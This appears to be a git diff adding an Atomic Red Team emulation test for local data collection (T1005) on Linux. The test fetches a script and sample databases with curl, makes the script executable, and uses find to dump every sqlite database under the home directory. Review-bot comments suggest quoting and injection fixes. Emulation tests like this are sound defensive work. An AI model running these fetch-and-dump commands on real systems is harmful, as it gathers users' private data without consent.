diff --git a/atomics/T1005/T1005.yaml b/atomics/T1005/T1005.yaml
index 0f84e893cb..7c29fad1e4 100644
--- a/atomics/T1005/T1005.yaml
+++ b/atomics/T1005/T1005.yaml
@@ -1,5 +1,5 @@
 attack_technique: T1005
-display_name: 'Data from Local System'
+display_name: Data from Local System
 atomic_tests:
 - name: Search files of interest and save them to a single zip file (Windows)
   auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
@@ -52,4 +52,38 @@ atomic_tests:
       Remove-Item -Path $outputZip\data.zip -Force
     name: powershell
-    elevation_required: false
\ No newline at end of file
+    elevation_required: false
+- name: Find and dump sqlite databases (Linux)
+  description: |
+    An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
+      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cd $HOME
+      curl -O #{remote_url}/art
+      curl -O #{remote_url}/gta.db
+      curl -O #{remote_url}/sqlite_dump.sh
+      chmod +x sqlite_dump.sh
+      find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
+    cleanup_command: |
+      rm -f $HOME/.art
+      rm -f $HOME/gta.db
+      rm -f $HOME/sqlite_dump.sh
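Review bot: The cleanup_command removes `$HOME/.art`, but the executor fetches that payload with `curl -O #{remote_url}/art`, which saves it as `$HOME/art`, so the file is left behind after cleanup; change the line to `rm -f $HOME/art`. The find line also splices each discovered path into the `bash -c` string via `{}`, so any file name under $HOME that contains a quote or `$(` breaks the inline script or is interpreted by it — pass the path as a positional argument instead: `find . ! -executable -exec bash -c '[[ "$(head -c 15 "$1" | strings)" == "SQLite format 3" ]] && { echo "$1"; ./sqlite_dump.sh "$1"; }' _ {} \;`. The three curl calls carry no `-f`, so a failed download leaves an HTML error body in place of the payload and the test continues silently; `curl -fsSO` would make the executor fail at that step. The dependency description reads "Check if running on a Debian based machine" while prereq_command actually checks that sqlite3, curl and strings are installed; reword it to match what is checked.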
diff --git a/atomics/T1005/src/art b/atomics/T1005/src/art
new file mode 100644
index 0000000000..a4d0780c4c
Binary files /dev/null and b/atomics/T1005/src/art differ
diff --git a/atomics/T1005/src/gta.db b/atomics/T1005/src/gta.db
new file mode 100644
index 0000000000..83136923cf
Binary files /dev/null and b/atomics/T1005/src/gta.db differ
diff --git a/atomics/T1005/src/sqlite_dump.sh b/atomics/T1005/src/sqlite_dump.sh
new file mode 100644
index 0000000000..ef7f90d360
--- /dev/null
+++ b/atomics/T1005/src/sqlite_dump.sh
@@ -0,0 +1,31 @@
+#!/bin/bash
+
+# This script will dump each table in a sqlite 3 database
+
+# Check if the first command-line argument is empty
+if [ -z "$1" ]; then
+  echo "Error: No filename provided. Exiting..."
+  exit 1
+fi
+
+# Set the name of the SQLite database file
+DB_NAME=$1
+
+if [ "$(head -c 15 $DB_NAME |strings)" == "SQLite format 3" ]
+then
+  # List all tables
+  echo "List of tables:"
+  sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';"
+
+  # Retrieve all rows from each table
+  tables=$(sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';")
+  echo "Retrieving data from tables:"
+  for table in $tables; do
+    echo "Table: $table"
+    sqlite3 $DB_NAME "SELECT * FROM $table;"
+  done
+  echo ""
+else
+  echo "Error: The file is not a sqlite database."
+  exit 1
+fi
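Review bot: Every `sqlite3 $DB_NAME` call and the `head -c 15 $DB_NAME` check expand the path unquoted, so a database path containing whitespace (which the caller's recursive find over $HOME can easily hand in) is split into several arguments and the file is misreported as not a database; quote them as `"$DB_NAME"`. `for table in $tables` likewise word-splits table names, and `SELECT * FROM $table;` interpolates the name bare, so a name with spaces or a reserved word yields invalid SQL; read the names line by line and double-quote the identifier. The sqlite_master query is also issued twice, once only to print and once to capture; a single capture printed with printf covers both. The rewrite below keeps the argument check and the else branch unchanged.

```shell
DB_NAME=$1

if [ "$(head -c 15 "$DB_NAME" | strings)" == "SQLite format 3" ]
then
  # Query sqlite_master once; sqlite3 prints one table name per line
  tables=$(sqlite3 "$DB_NAME" "SELECT name FROM sqlite_master WHERE type='table';")
  echo "List of tables:"
  printf '%s\n' "$tables"

  # Retrieve all rows from each table
  echo "Retrieving data from tables:"
  while IFS= read -r table; do
    [ -n "$table" ] || continue
    echo "Table: $table"
    # double-quote the identifier ("" escapes an embedded quote) so unusual names stay valid SQL
    quoted=${table//\"/\"\"}
    sqlite3 "$DB_NAME" "SELECT * FROM \"$quoted\";"
  done <<<"$tables"
  echo ""
# … unchanged: else branch (not-a-database error) and fi …
```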